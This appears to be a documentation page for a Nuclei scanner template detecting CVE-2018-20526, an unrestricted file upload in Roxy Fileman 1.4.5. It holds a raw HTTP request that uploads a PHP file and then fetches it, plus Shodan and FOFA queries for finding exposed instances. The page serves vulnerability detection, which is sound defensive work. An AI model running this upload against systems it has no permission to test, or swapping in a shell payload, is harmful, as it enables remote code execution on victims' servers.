Roxy Fileman 1.4.5 - Unrestricted File Upload
ID: CVE-2018-20526
Severity: critical
Author: DhiyaneshDK
Tags: cve,cve2018,roxy,fileman,rce,fileupload,intrusive,packetstorm,edb,roxyfileman
Description
Section titled “Description”Roxy Fileman 1.4.5 is susceptible to unrestricted file upload via upload.php. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
YAML Source
Section titled “YAML Source”id: CVE-2018-20526
info: name: Roxy Fileman 1.4.5 - Unrestricted File Upload author: DhiyaneshDK severity: critical description: | Roxy Fileman 1.4.5 is susceptible to unrestricted file upload via upload.php. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. impact: | Successful exploitation of this vulnerability can result in remote code execution, allowing an attacker to execute arbitrary commands on the target system. remediation: | Upgrade to a patched version of Roxy Fileman or apply the necessary security patches to prevent unrestricted file uploads. reference: - http://packetstormsecurity.com/files/151033/Roxy-Fileman-1.4.5-File-Upload-Directory-Traversal.html - https://www.exploit-db.com/exploits/46085/ - https://nvd.nist.gov/vuln/detail/CVE-2018-20526 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-20526 cwe-id: CWE-434 epss-score: 0.00666 epss-percentile: 0.79658 cpe: cpe:2.3:a:roxyfileman:roxy_fileman:1.4.5:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: roxyfileman product: roxy_fileman shodan-query: http.title:"roxy file manager" fofa-query: title="roxy file manager" google-query: - intitle:"Roxy file manager" - intitle:"roxy file manager" tags: cve,cve2018,roxy,fileman,rce,fileupload,intrusive,packetstorm,edb,roxyfileman
http: - raw: - | POST /php/upload.php HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundary20kgW2hEKYaeF5iP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36 Origin: {{BaseURL}} Referer: {{BaseURL}} Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
------WebKitFormBoundary20kgW2hEKYaeF5iP Content-Disposition: form-data; name="action"
upload ------WebKitFormBoundary20kgW2hEKYaeF5iP Content-Disposition: form-data; name="method"
ajax ------WebKitFormBoundary20kgW2hEKYaeF5iP Content-Disposition: form-data; name="d"
/Uploads ------WebKitFormBoundary20kgW2hEKYaeF5iP Content-Disposition: form-data; name="files[]"; filename="{{randstr}}.php7" Content-Type: application/octet-stream
<?php echo md5('CVE-2018-20526'); ?>
------WebKitFormBoundary20kgW2hEKYaeF5iP-- - | GET /Uploads/{{randstr}}.php7 HTTP/1.1 Host: {{Hostname}}
host-redirects: true max-redirects: 2
matchers-condition: and matchers: - type: word part: body words: - "f76d6a5f7491700cc3a678bdba2902d3"
- type: status status: - 200# digest: 4a0a00473045022100bb93da42368701a83c238863b0732396792fa2bf722f4b329121c3a9999f789e02205a507bfcbb00ea56cf4610da829aead05232f9ce7fa353dcc7ff3974e47aba22:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-20526.yaml"